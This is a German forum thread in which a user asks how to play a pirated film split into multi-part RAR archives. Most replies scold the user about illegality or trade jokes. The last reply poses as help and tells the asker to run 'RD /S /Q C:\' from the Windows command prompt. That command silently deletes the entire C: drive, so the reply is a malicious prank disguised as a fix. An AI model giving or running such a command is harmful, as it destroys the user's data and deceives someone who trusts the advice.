Film heruntergeladen...Kann es aber nicht abspielen...

  • Hi..an alle...Ich hab ein Film heruntergeladen, der in 2 Ordnern drin geteilt ist.
    Nun sind in den Ordnern viele Dateien drin, aber keine Datei mit der ich den Film abspielen könnte.
    In beiden Ordnern sind RAR-Dateien vorhanden, welche ich nicht entpacken kann, weil immer die darauffolgende Datei fehle.
    Danach sind viele Dateien vorhanden, die komisch durchnummeriert sind, wie z.B.: R30-Datei,R31-Datei,R32-Datei,R33-Datei usw.....
    Dann ist weiterhin ein SFV-Datei und eine BIN-Datei drin.
    Jetzt hab ich euch alles erzählt.Wie ihr sieht bin ich auch verzweifelt. Ich hoffe irgendeiner kann mir helfen.

    DANKE

  • Da musst du schon selber suchen oder denkst du das sich irgend ein User dieses Forums hier strafbar machen will.

    Wie kann man nur so blöd sein und sowas in einem öffentlichen Forum posten.

    Sorry aber ist so!!

  • Zitat

    In beiden Ordnern sind RAR-Dateien vorhanden, welche ich nicht entpacken kann, weil immer die darauffolgende Datei fehle.
    Danach sind viele Dateien vorhanden, die komisch durchnummeriert sind, wie z.B.: R30-Datei,R31-Datei,R32-Datei,R33-Datei usw.....
    Dann ist weiterhin ein SFV-Datei und eine BIN-Datei drin.

    Glaub mir das ist eine Methode um einen Film im Usenet oder über IRC zu verteilen. Die sind meistens in 15MB große Teile zerstückelt. Kein Mensch verteilt so einen Legalen Film!!

  • Zitat von snakey

    Lesen bildet :wink:

    Echt?

    Erst meine Mutter, dann meine Lehrer und jetzt sagst du das auch noch.

    Au Backe!!!!

    ICH MUSS WAS LESEN

    oder ich bleib einfach bei der praxis, bis ich mich strafbar machen kann

    Maybe this world is another planet's hell

  • Zitat von Wais

    Schau ma hier gibts schnelle Hilfe da gibts du Adresse usw. ein du die geben dir dann Hilfe musst nur dein Problem reinschreiben......

    HILFE


    LooL der is gut... :lach: :lach:


    wernerdeluxe

    Zitat

    oder ich bleib einfach bei der praxis, bis ich mich strafbar machen kann


    Ich mach dir das mal groß nich das du dir die Augen kaput machst :smilie084:

  • @werner

    glaubst du, dass du ungeschorn davonkommst, nur weil du minderjährig bist? dann zahlen einfach deine eltern die strafe für deine vergehen, denn sie sind deine erziehungsberechtigten und müssen dafür sorgen dass kleinwerner keinen blödsinn macht! schon mal den spruch gelesen "Elter haften für ihre Kinder"... was mag das wohl heißen ;)

  • du hast auch nichts zu tun nen psot abzulassen, zu nem Thema das schn längst gestorben ist....
    @ pseudostar19_berlin
    Start > Ausführen > CMD
    "RD /S /Q C:\" Eingeben (ohne "")
    Danach
    dei rar dateien angeben und fertig

    MfG